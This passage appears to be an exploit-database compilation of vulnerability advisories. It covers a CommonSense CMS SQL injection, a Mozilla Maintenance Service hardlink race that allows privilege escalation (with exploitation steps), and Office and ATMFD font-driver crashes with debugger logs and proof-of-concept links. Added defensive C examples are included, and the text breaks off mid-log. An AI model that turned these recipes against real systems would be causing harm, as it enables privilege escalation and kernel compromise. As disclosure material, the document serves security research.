Source: https://www.securityfocus.com/bid/55893/info
 
CommonSense CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
 
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
 http://www.example.com/special.php?id=1 [SQL Injection] 
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=427&can=1

Mozilla Maintenance Service: Log File Overwrite Elevation of Privilege
Platform: Windows
Version: Mozilla Firefox 38.0.5
Class: Elevation of Privilege

Summary:
The maintenance service creates a log file in a user writable location. It’s possible to change the log file to a hardlink to another file to cause file corruption or elevation of privilege. 

Description:
When the maintenance service starts it creates a log file under c:\programdata\mozilla\logs. This is done in maintenanceservice.cpp/SvcMain. The directory it creates the file in has fairly permissive permissions, which allow a normal user to create new files underneath it. It’s possible to race the creation of the log file during service initialization and drop a hardlink to an existing file on the same drive (which is probably the system drive); when the maintenance service, running as Local System, opens that link, the target file is overwritten with the log data.

At the very least this would corrupt the target file; however, as the user has some control over parts of the contents, such as the updater path, it’s possible to get some user-controlled content in there. This might be used to elevate privileges by overwriting a script file which has a permissive parser, such as PowerShell, batch or HTA, which subsequently gets executed by a privileged process.

The only slight difficulty in exploitation is that the user cannot directly delete the log file to replace it with a hardlink. However, this isn’t a significant issue: before opening the log file, the service backs up the log to a new name, leaving the directory entry for “maintenanceservice.log” free. Therefore there’s a race window between the log file being moved out of the way and the new log file being created.

So to exploit this you perform the following operations:

1. Start a thread which creates a hard link in the log directory to the file you want to overwrite. Repeat until successful.
2. In another thread, start the service, passing the arbitrary content you want to insert as the path to the updater file.

A similar vulnerability exists in the update.status handling, for example in WriteStatusFailure, which will write update.status to any location you specify. You can use a hardlink to force the file to be overwritten. In this case this would only cause file corruption, as the user has no real control over the contents.

If I could recommend fixes: either make the logs directory writable only by administrators, or use CopyFile instead of MoveFile when backing up the previous logs. I would not recommend trying to do anything like inspecting the file for hardlinks or similar.
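
As an added illustration (not part of the report and not Mozilla's code), the two ways a service can open a log file in a directory other users may write to, side by side. The report's recommended fixes are the directory ACL and CopyFile; the open-flag change shown here is a further mitigation the report does not propose, and it is expressed in POSIX terms so it runs anywhere: O_CREAT|O_EXCL demands a brand-new directory entry, which is the same guarantee the CREATE_NEW disposition gives CreateFile on Windows. The temporary directory, file names and contents are constructed for the demo.

```c
#define _XOPEN_SOURCE 700
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern: "open or create, then truncate". The call follows whatever
 * directory entry already sits at 'path'; if someone planted a hard link there,
 * the link's target is the file that gets truncated and overwritten. */
int open_log_unsafe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0644);
}

/* Hardened pattern: insist on a brand-new directory entry. If anything already
 * occupies the name, the call fails with EEXIST and nothing is truncated.
 * O_NOFOLLOW additionally refuses a symlink at the final path component. */
int open_log_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
}

static int write_all(int fd, const char *s)
{
    size_t n = strlen(s);
    while (n > 0) {
        ssize_t w = write(fd, s, n);
        if (w < 0) return -1;
        s += w;
        n -= (size_t)w;
    }
    return 0;
}

/* One scenario in a fresh temporary directory (constructed for this demo):
 *   1. create target.txt holding 19 bytes the "service" has no business touching,
 *   2. hard-link it to the log name the service is about to create, standing in
 *      for the moment after the old log was moved away and the name became free,
 *   3. let the service open its log with the chosen pattern and write one line.
 * Returns the size of target.txt afterwards, or -1 if the setup itself failed. */
long run_scenario(int use_safe_open)
{
    char dir[] = "/tmp/logdemo-XXXXXX";
    char target[256], logpath[256];
    struct stat st;
    long result = -1;
    int fd;

    if (mkdtemp(dir) == NULL) return -1;
    snprintf(target, sizeof target, "%s/target.txt", dir);
    snprintf(logpath, sizeof logpath, "%s/maintenanceservice.log", dir);

    fd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0) goto cleanup;
    if (write_all(fd, "important contents\n") < 0) { close(fd); goto cleanup; }
    close(fd);

    if (link(target, logpath) < 0) goto cleanup;          /* the planted hard link */

    fd = use_safe_open ? open_log_safe(logpath) : open_log_unsafe(logpath);
    if (fd >= 0) {
        write_all(fd, "log line\n");                      /* 9 bytes of "log data" */
        close(fd);
    } else if (errno != EEXIST) {
        goto cleanup;                                     /* a failure other than the refusal we want */
    }

    if (stat(target, &st) == 0) result = (long)st.st_size;

cleanup:
    unlink(logpath);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("O_TRUNC open: target.txt is %ld bytes afterwards\n", run_scenario(0));  /* 9: clobbered */
    printf("O_EXCL open:  target.txt is %ld bytes afterwards\n", run_scenario(1));  /* 19: intact */
    return 0;
}
```

With the truncating open the 19-byte target ends up holding only the 9-byte log line; with the exclusive open the service's open fails with EEXIST and the target is untouched. The exclusive open is not the hardlink inspection the report advises against: it never looks at link counts, it simply refuses to reuse an existing name, and a service that gets EEXIST should log the failure through another channel rather than fall back to the truncating form.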

Proof of Concept:

I’ve attached a proof of concept; it’s written in C#. You’ll need to compile it with the C# csc compiler. NOTE: you might need to run this on a multi-core machine to stand a chance of winning the race.

1) Compile the PoC
2) Execute the PoC passing the name of a file you want to overwrite on the command line
3) Program should run and print Done if successful

Expected Result:
The log file is created as normal

Observed Result:
The target file has been overwritten with the contents of the log file

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37925.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=431&can=1

The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86. 

The crash is caused by a 1 bit delta from the original file at offset 0xA9B0. Standard tools did not identify anything significant about this offset in the minimized file.

Attached files:

Fuzzed minimized PoC: 3423415565_min.doc
Fuzzed non-minimized PoC: 3423415565_crash.doc
Original non-fuzzed file: 3423415565_orig.doc
	
DLL Versions:

wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000

Observed Crash:

eax=0000b69a ebx=0e370fb8 ecx=0e431ee8 edx=0e433fc0 esi=abcdbbbb edi=fffffffe
eip=6bdd9ddf esp=00129c58 ebp=00129c9c iopl=0         nv up ei pl nz na pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010207
MSPTLS!LssbFIsSublineEmpty+0xa327:

6bdd9dc4 83e808          sub     eax,8
6bdd9dc7 4f              dec     edi
6bdd9dc8 3930            cmp     dword ptr [eax],esi
6bdd9dca 7ff8            jg      MSPTLS!LssbFIsSublineEmpty+0xa30c (6bdd9dc4)
6bdd9dcc 897ddc          mov     dword ptr [ebp-24h],edi
6bdd9dcf 8bc7            mov     eax,edi
6bdd9dd1 6bc01c          imul    eax,eax,1Ch
6bdd9dd4 03c8            add     ecx,eax
6bdd9dd6 8b7118          mov     esi,dword ptr [ecx+18h]
6bdd9dd9 8945d4          mov     dword ptr [ebp-2Ch],eax
6bdd9ddc 8b04fa          mov     eax,dword ptr [edx+edi*8]
=> 6bdd9ddf 8b5670          mov     edx,dword ptr [esi+70h] ds:0023:abcdbc2b=????????

0:000> kb
ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00129c9c 6bdda05b 02000000 00129cb0 0e370fa0 MSPTLS!LssbFIsSublineEmpty+0xa327
00129cb8 6bdd481c 0e370fb8 00129d04 00129d48 MSPTLS!LssbFIsSublineEmpty+0xa5a3
00129cf8 6bde528a 0019f4cd 0019f4cd 00000000 MSPTLS!LssbFIsSublineEmpty+0x4d64
00129d70 6bde54c2 0e186fa0 00129dc8 0012a038 MSPTLS!LssbFIsSublineEmpty+0x157d2
00129d98 6bddf354 02996ec0 00129f14 0e186fa0 MSPTLS!LssbFIsSublineEmpty+0x15a0a
00129f9c 6bdc4b85 02990320 000002d4 0019f4cd MSPTLS!LssbFIsSublineEmpty+0xf89c
00129fd0 312dbeea 02990320 000002d4 0019f4cd MSPTLS!LsCreateLine+0x23
0012a044 312dba15 02a33088 0ca8c9c0 000002d4 wwlib!FMain+0x97933
0012a0ac 312db45a 0af2cf30 0e811fe8 000002d4 wwlib!FMain+0x9745e
0012a19c 6be51b27 0af2cf30 0cb10fb0 01cccb78 wwlib!FMain+0x96ea3
0012a23c 6be6a137 00000000 0e811fe8 0ccccb78 MSPTLS!FsDestroyMemory+0x1ee4e
0012a310 6be6d6f8 00000000 00000033 00000000 MSPTLS!FsDestroyMemory+0x3745e

We can see that esi holds the Application Verifier heap chunk canary value placed at the start of allocated chunks. Clearly we've indexed somewhere we shouldn't be. In this case we can see that esi came from [ecx+18h], and ecx was moved backwards in memory due to the negative value in edi. These pointers are used later on in the vulnerable function to write data, leading to memory corruption.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37924.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=382&can=1

We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:

---
DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6)
N bytes of memory was allocated and more than N bytes are being referenced.
This cannot be protected by try-except.
When possible, the guilty driver's name (Unicode string) is printed on
the bugcheck screen and saved in KiBugCheckDriver.
Arguments:
Arg1: ffb4da9f, memory referenced
Arg2: 00000000, value 0 = read operation, 1 = write operation
Arg3: 92a7a902, if non-zero, the address which referenced memory.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


READ_ADDRESS:  ffb4da9f Special pool

FAULTING_IP: 
ATMFD+2a902
92a7a902 0fb600          movzx   eax,byte ptr [eax]

MM_INTERNAL_CODE:  0

IMAGE_NAME:  ATMFD.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  54e6a55a

MODULE_NAME: ATMFD

FAULTING_MODULE: 92a50000 ATMFD

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0xD6

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

TRAP_FRAME:  945bcd54 -- (.trap 0xffffffff945bcd54)
ErrCode = 00000000
eax=ffb4da9f ebx=945bd0ec ecx=ffb4da9f edx=ffb4dea8 esi=945bd2fc edi=00002932
eip=92a7a902 esp=945bcdc8 ebp=945bd4c0 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
ATMFD+0x2a902:
92a7a902 0fb600          movzx   eax,byte ptr [eax]         ds:0023:ffb4da9f=??
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82723ce7 to 826bf2d8

STACK_TEXT:  
945bc8a4 82723ce7 00000003 46aca596 00000065 nt!RtlpBreakWithStatusInstruction
945bc8f4 827247e5 00000003 00000000 00000002 nt!KiBugCheckDebugBreak+0x1c
945bccb8 826d2391 00000050 ffb4da9f 00000000 nt!KeBugCheck2+0x68b
945bcd3c 82684c48 00000000 ffb4da9f 00000000 nt!MmAccessFault+0x104
945bcd3c 92a7a902 00000000 ffb4da9f 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
945bd4c0 92a7f6e0 fab90c70 92a8f028 945bd70c ATMFD+0x2a902
945bd57c 92a727ae fab90c70 92a8f028 945bd70c ATMFD+0x2f6e0
945bd668 92a72858 fab90c70 945bd70c 945bd790 ATMFD+0x227ae
945bd694 92a632b2 fab90c70 92a8f028 945bd70c ATMFD+0x22858
945bd7f8 92a63689 0000000b 945bd918 fb64c8b0 ATMFD+0x132b2
945bd84c 92a5406d 0000000b 945bd918 fb64c8b0 ATMFD+0x13689
945bd8a0 92badcf2 ff7a5010 fa4f4cf0 00000001 ATMFD+0x406d
945bd8e8 92bb3784 ff7a5010 fa4f4cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
945bd960 92c2bdcd 945bdc3c fb665704 fb64c8b0 win32k!xInsertMetricsPlusRFONTOBJ+0x120
945bd990 92ba5964 00000003 ff7bf020 945bdcd4 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
945bd9c8 92c2b8cb 945bdc1c 945bdc3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
945bda0c 92ba55e7 945bdcd0 00000003 945bdc1c win32k!ESTROBJ::vInit+0x268
945bdc2c 92ba57aa 00000000 945bdcd0 fa4f4cf0 win32k!GreGetTextExtentExW+0x12a
945bdd0c 82681a66 20010483 00b20b1c 00000003 win32k!NtGdiGetTextExtentExW+0x141
945bdd0c 773c70f4 20010483 00b20b1c 00000003 nt!KiSystemServicePostCall
0031f6d4 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---

The memory read instruction causing the crash is responsible for fetching the next CharString instruction from the input stream, in order to execute it as part of the PostScript state machine. This bug is similar to issue 174, which described the lack of bounds checking on the instruction pointer in the interpreter function, making it possible to crash the operating system or potentially disclose chunks of kernel-mode memory. While that problem was fixed in bulletin MS15-021 by introducing the missing bounds checks, out-of-bounds access to the instruction stream is still possible, as shown in the crash log above. The exact root cause of the vulnerability is unknown.
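
As an added example (not ATMFD's code, and not a claim about the root cause the report leaves open), a fetch routine for the Type 2 charstring token encoding whose bounds check covers the whole token rather than just its first byte. Multi-byte tokens (the 12 escape prefix, the 28 and 255 operand prefixes, the 247..254 two-byte operands) are the general reason a check of the form `ip < len` is not enough on its own: the check has to be `len - ip >= width(b0)`. The token layout, operator numbering convention (escaped operators reported as 1200 + second byte) and sample streams are constructed for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* One decoded token (layout constructed for this demo, not ATMFD's). */
typedef struct {
    int     is_operator;   /* 1 = operator, 0 = operand */
    int32_t value;         /* operand value (255-prefixed 16.16 values kept raw), or
                              operator code; escaped operators are encoded as 1200 + b1 */
} cs_token;

/* Total byte width of the token introduced by b0, per the Type 2 charstring encoding. */
static size_t token_width(uint8_t b0)
{
    if (b0 == 28)  return 3;   /* 16-bit operand */
    if (b0 == 255) return 5;   /* 32-bit operand */
    if (b0 == 12)  return 2;   /* escape prefix: two-byte operator */
    if (b0 <= 246) return 1;   /* one-byte operator (0..31) or small operand (32..246) */
    return 2;                  /* 247..254: two-byte operand */
}

/* Fetches the token at *ip and advances *ip past it. The bounds check covers the
 * token's full width, so a trailing escape/28/255 whose operand bytes are missing
 * is refused instead of being read past 'len'.
 * Returns 1 on success, 0 at a clean end of stream, -1 on overrun. */
int cs_fetch(const uint8_t *prog, size_t len, size_t *ip, cs_token *out)
{
    if (*ip == len) return 0;
    if (*ip > len)  return -1;               /* ip already beyond the end, e.g. after a bad jump */
    const uint8_t *b = prog + *ip;
    size_t w = token_width(b[0]);
    if (len - *ip < w) return -1;            /* not enough bytes left for this whole token */

    if (b[0] <= 31 && b[0] != 28) {
        out->is_operator = 1;
        out->value = (b[0] == 12) ? 1200 + b[1] : b[0];
    } else {
        out->is_operator = 0;
        if (b[0] == 28)       out->value = (int16_t)((b[1] << 8) | b[2]);
        else if (b[0] == 255) out->value = (int32_t)(((uint32_t)b[1] << 24) | ((uint32_t)b[2] << 16) |
                                                     ((uint32_t)b[3] << 8)  |  (uint32_t)b[4]);
        else if (b[0] <= 246) out->value = (int32_t)b[0] - 139;
        else if (b[0] <= 250) out->value = ((int32_t)b[0] - 247) * 256 + b[1] + 108;
        else                  out->value = -((int32_t)b[0] - 251) * 256 - b[1] - 108;
    }
    *ip += w;
    return 1;
}

/* Walks an entire charstring: returns its token count, or -1 if any token would
 * overrun the buffer. Accepting a stream here means every later fetch of the
 * same stream stays inside [prog, prog + len). */
int cs_validate(const uint8_t *prog, size_t len)
{
    size_t ip = 0;
    int count = 0, r;
    cs_token t;
    while ((r = cs_fetch(prog, len, &ip, &t)) == 1) count++;
    return r < 0 ? -1 : count;
}

/* Decodes the single token at 'ip'; returns its value, or INT32_MIN if it would overrun. */
int32_t cs_value_at(const uint8_t *prog, size_t len, size_t ip)
{
    cs_token t;
    return cs_fetch(prog, len, &ip, &t) == 1 ? t.value : INT32_MIN;
}

/* Constructed sample streams (not taken from the PoC fonts). */
const uint8_t cs_sample_ok[13]   = { 149, 159, 1, 12, 35, 28, 0x01, 0x00, 247, 0, 251, 0, 14 };
const uint8_t cs_sample_esc[2]   = { 139, 12 };    /* escape prefix with its second byte missing */
const uint8_t cs_sample_short[2] = { 28, 0x00 };   /* 16-bit operand with only one byte present */

int main(void)
{
    printf("ok stream:   %d tokens\n", cs_validate(cs_sample_ok, sizeof cs_sample_ok));      /* 8 */
    printf("cut escape:  %d\n", cs_validate(cs_sample_esc, sizeof cs_sample_esc));          /* -1 */
    printf("cut operand: %d\n", cs_validate(cs_sample_short, sizeof cs_sample_short));      /* -1 */
    return 0;
}
```

The two truncated samples are accepted by a first-byte-only check (their first byte is in range) and rejected here; a real interpreter also has to re-apply the same check after any operator that rewrites the instruction pointer (subroutine call and return), since an ip that lands past the end is exactly what the `*ip > len` branch exists for.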

The issue reproduces on Windows 7. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it might also be possible to observe a crash on a default Windows installation, depending on the specific test case used.

Attached is an archive with two proof of concept font files together with corresponding kernel crash logs.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37923.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=383&can=1

We have encountered a Windows kernel crash in the ATMFD.DLL OpenType driver while processing a corrupted OTF font file:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff67a024, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 98b54072, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL

READ_ADDRESS:  ff67a024 Paged session pool

FAULTING_IP: 
ATMFD+34072
98b54072 8b700c          mov     esi,dword ptr [eax+0Ch]

MM_INTERNAL_CODE:  0

IMAGE_NAME:  ATMFD.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  54e6a55a

MODULE_NAME: ATMFD

FAULTING_MODULE: 98b20000 ATMFD

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

TRAP_FRAME:  9d793d9c -- (.trap 0xffffffff9d793d9c)
ErrCode = 00000000
eax=ff67a018 ebx=fbea4830 ecx=00000000 edx=00000000 esi=fbffe7c0 edi=fbffe7c0
eip=98b54072 esp=9d793e10 ebp=9d793e38 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202
ATMFD+0x34072:
98b54072 8b700c          mov     esi,dword ptr [eax+0Ch] ds:0023:ff67a024=????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82714ce7 to 826b02d8

STACK_TEXT:  
9d7938ec 82714ce7 00000003 8d6243ee 00000065 nt!RtlpBreakWithStatusInstruction
9d79393c 827157e5 00000003 00000000 00002522 nt!KiBugCheckDebugBreak+0x1c
9d793d00 826c3391 00000050 ff67a024 00000000 nt!KeBugCheck2+0x68b
9d793d84 82675c48 00000000 ff67a024 00000000 nt!MmAccessFault+0x104
9d793d84 98b54072 00000000 ff67a024 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
9d793e38 98b4d5b5 fbffe7c0 fbea4830 00000f5c ATMFD+0x34072
9d794544 98b4f6e0 fbbfac70 98b5f028 9d794790 ATMFD+0x2d5b5
9d794600 98b427ae fbbfac70 98b5f028 9d794790 ATMFD+0x2f6e0
9d7946ec 98b42858 fbbfac70 9d794790 9d794814 ATMFD+0x227ae
9d794718 98b332b2 fbbfac70 98b5f028 9d794790 ATMFD+0x22858
9d79487c 98b33689 0000000b 9d79499c fad3ef00 ATMFD+0x132b2
9d7948d0 98b2406d 0000000b 9d79499c 00000000 ATMFD+0x13689
9d794924 9888dcf2 ff7a5010 fad30cf0 00000001 ATMFD+0x406d
9d79496c 988767cb ff7a5010 fad30cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
9d7949e0 988a1513 ffa6a130 fb23bd40 0000134b win32k!xInsertMetricsRFONTOBJ+0x9c
9d794a14 988a35f5 00000020 9d794aec 9d794c8a win32k!RFONTOBJ::bGetGlyphMetrics+0x131
9d794cb8 988b6684 0c010385 00001360 00000040 win32k!GreGetCharABCWidthsW+0x147
9d794d14 82672a66 0c010385 00001340 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
9d794d14 772b70f4 0c010385 00001340 00000040 nt!KiSystemServicePostCall
0017ed34 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---

The crash represents a read from invalid memory; prior to being dereferenced as an address, the EAX register is loaded with a value from ESI+0x34 (on 32-bit Windows), which points into an "Adbe" pool allocation:

---
kd> !pool fbffe7c0
Pool page fbffe7c0 region is Special pool
Address fbffe000 does not belong to any pool
*fbffe000 size:  898 data: fbffe768 (Paged session) *Adbe
		Pooltag Adbe : Adobe's font driver
---

The crash is always caused by an attempt to access memory at a constant offset past the memory page boundary (0x24 on 32-bit platforms), and the surrounding code is a loop over a linked list of structures. The EAX register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.

The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for ATMFD.DLL (leading to an immediate crash when the bug is triggered), but it should also be possible to observe a crash on a default Windows installation in ATMFD.DLL.

Attached is an archive with a proof of concept font file together with a corresponding kernel crash log.

------------------------------------------------------------------------------------------------------------------------------------------

We have also encountered a number of crashes where the read operation discussed above succeeds (moving the contents of [eax+0Ch] to esi), and a respective attempt to access the [esi+34h] address fails a few instructions later; for example:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fffb8034, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 9486407b, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------


Could not read faulting driver name

READ_ADDRESS: GetPointerFromAddress: unable to read from 8278184c
Unable to read MiSystemVaType memory at 82760f00
 fffb8034 

FAULTING_IP: 
ATMFD+3407b
9486407b 394e34          cmp     dword ptr [esi+34h],ecx

MM_INTERNAL_CODE:  0

DEFAULT_BUCKET_ID:  VISTA_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  0

LAST_CONTROL_TRANSFER:  from 9485d5b5 to 9486407b

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
879d7e38 9485d5b5 fba78880 fbbb6830 00000f5c ATMFD+0x3407b
879d8544 9485f6e0 fbad2c70 9486f028 879d8790 ATMFD+0x2d5b5
879d8600 948527ae fbad2c70 9486f028 879d8790 ATMFD+0x2f6e0
879d86ec 94852858 fbad2c70 879d8790 879d8814 ATMFD+0x227ae
879d8718 948432b2 fbad2c70 9486f028 879d8790 ATMFD+0x22858
879d887c 94843689 00000002 879d899c fbafaf58 ATMFD+0x132b2
879d88d0 9483406d 00000002 879d899c 00000000 ATMFD+0x13689
879d8924 9499dce2 ff7af010 fc01acf0 00000001 ATMFD+0x406d
879d896c 949867bb ff7af010 fc01acf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
879d89e0 949b14d7 ffa66130 ff646084 0000201c win32k!xInsertMetricsRFONTOBJ+0x9c
879d8a14 949b35b9 00000020 879d8bfc 879d8cac win32k!RFONTOBJ::bGetGlyphMetrics+0x131
879d8cb8 949c6644 10010188 00002020 00000040 win32k!GreGetCharABCWidthsW+0x147
879d8d14 82654896 10010188 00002000 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
879d8d14 776f70f4 10010188 00002000 00000040 nt!KiSystemServicePostCall
001bf3e4 00000000 00000000 00000000 00000000 0x776f70f4
---

Attached are three further samples, together with corresponding crash log files, which reproduce the issue at the ATMFD+0x3407b location.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37922.zip
            
Source: https://code.google.com/p/google-security-research/issues/detail?id=384&can=1

We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: fff82008, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91a3440b, If non-zero, the instruction address which referenced the bad memory
	address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

*** ERROR: Module load completed but symbols could not be loaded for ATMFD.DLL

READ_ADDRESS:  fff82008 

FAULTING_IP: 
ATMFD+3440b
91a3440b 8b7e08          mov     edi,dword ptr [esi+8]

MM_INTERNAL_CODE:  0

IMAGE_NAME:  ATMFD.DLL

DEBUG_FLR_IMAGE_TIMESTAMP:  54e6a55a

MODULE_NAME: ATMFD

FAULTING_MODULE: 91a00000 ATMFD

DEFAULT_BUCKET_ID:  WIN7_DRIVER_FAULT

BUGCHECK_STR:  0x50

PROCESS_NAME:  csrss.exe

CURRENT_IRQL:  2

ANALYSIS_VERSION: 6.3.9600.17237 (debuggers(dbg).140716-0327) x86fre

TRAP_FRAME:  97ff8d54 -- (.trap 0xffffffff97ff8d54)
ErrCode = 00000000
eax=ff677018 ebx=00000001 ecx=00000001 edx=0000000b esi=fff82000 edi=fb63e940
eip=91a3440b esp=97ff8dc8 ebp=97ff8de8 iopl=0         nv up ei ng nz na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
ATMFD+0x3440b:
91a3440b 8b7e08          mov     edi,dword ptr [esi+8] ds:0023:fff82008=????????
Resetting default scope

LAST_CONTROL_TRANSFER:  from 82724ce7 to 826c02d8

STACK_TEXT:  
97ff88a4 82724ce7 00000003 4b979438 00000065 nt!RtlpBreakWithStatusInstruction
97ff88f4 827257e5 00000003 00000000 00000000 nt!KiBugCheckDebugBreak+0x1c
97ff8cb8 826d3391 00000050 fff82008 00000000 nt!KeBugCheck2+0x68b
97ff8d3c 82685c48 00000000 fff82008 00000000 nt!MmAccessFault+0x104
97ff8d3c 91a3440b 00000000 fff82008 00000000 nt!KiTrap0E+0xdc
WARNING: Stack unwind information not available. Following frames may be wrong.
97ff8de8 91a345f7 fb6ba380 0000000b fb6ba3ac ATMFD+0x3440b
97ff8e10 91a29eec fb63e8c0 ff6770d8 91a463ec ATMFD+0x345f7
97ff8e34 91a2e987 fb8f4c70 91a463ec 00000f5c ATMFD+0x29eec
97ff9544 91a2f6e0 fb8f4c70 91a3f028 97ff9790 ATMFD+0x2e987
97ff9600 91a227ae fb8f4c70 91a3f028 97ff9790 ATMFD+0x2f6e0
97ff96ec 91a22858 fb8f4c70 97ff9790 97ff9814 ATMFD+0x227ae
97ff9718 91a132b2 fb8f4c70 91a3f028 97ff9790 ATMFD+0x22858
97ff987c 91a13689 ffffffff 97ff999c fb68af58 ATMFD+0x132b2
97ff98d0 91a0406d ffffffff 97ff999c 00000000 ATMFD+0x13689
97ff9924 91b2dcf2 ff7a5010 fb700cf0 00000001 ATMFD+0x406d
97ff996c 91b167cb ff7a5010 fb700cf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
97ff99e0 91b41513 ffa6a130 fb93cb14 000000e0 win32k!xInsertMetricsRFONTOBJ+0x9c
97ff9a14 91b435f5 00000020 97ff9a3c 97ff9c74 win32k!RFONTOBJ::bGetGlyphMetrics+0x131
97ff9cb8 91b56684 020101c3 00000100 00000020 win32k!GreGetCharABCWidthsW+0x147
97ff9d14 82682a66 020101c3 000000c0 00000040 win32k!NtGdiGetCharABCWidthsW+0xf8
97ff9d14 76ee70f4 020101c3 000000c0 00000040 nt!KiSystemServicePostCall
002cf224 00000000 00000000 00000000 00000000 ntdll!KiFastSystemCallRet
---

The crash represents a read from invalid memory; prior to being dereferenced as an address, the ESI register is loaded with a value from EAX+0x30 (on 32-bit Windows), which points into an "Adbe" pool allocation:

---
0: kd> !pool 9d619018
Pool page 9d619018 region is Paged session pool
9d619000 is not a valid large pool allocation, checking large session pool...
*9d619000 : large page allocation, Tag is Adbe, size is 0x4018 bytes
		Pooltag Adbe : Adobe's font driver
---

The surrounding code is a loop over a linked list of structures; the ESI register at the time of the crash holds a [F/B]link address which points to unmapped memory, potentially suggesting that the root cause of the crash is a use-after-free condition, or some kind of corruption of the linked list. Since the invalid address is later used to manipulate memory, we expect that this issue could be used to achieve remote code execution in the security context of the Windows kernel.

Moreover, we have also encountered similar crashes one instruction further in the code. In these cases, ESI turned out to point to mapped memory by accident, but its contents did not correspond to ATMFD's expectations (reinforcing the use-after-free hypothesis), resulting in an attempt to dereference a completely wild memory address, e.g.:

---
PAGE_FAULT_IN_NONPAGED_AREA (50)
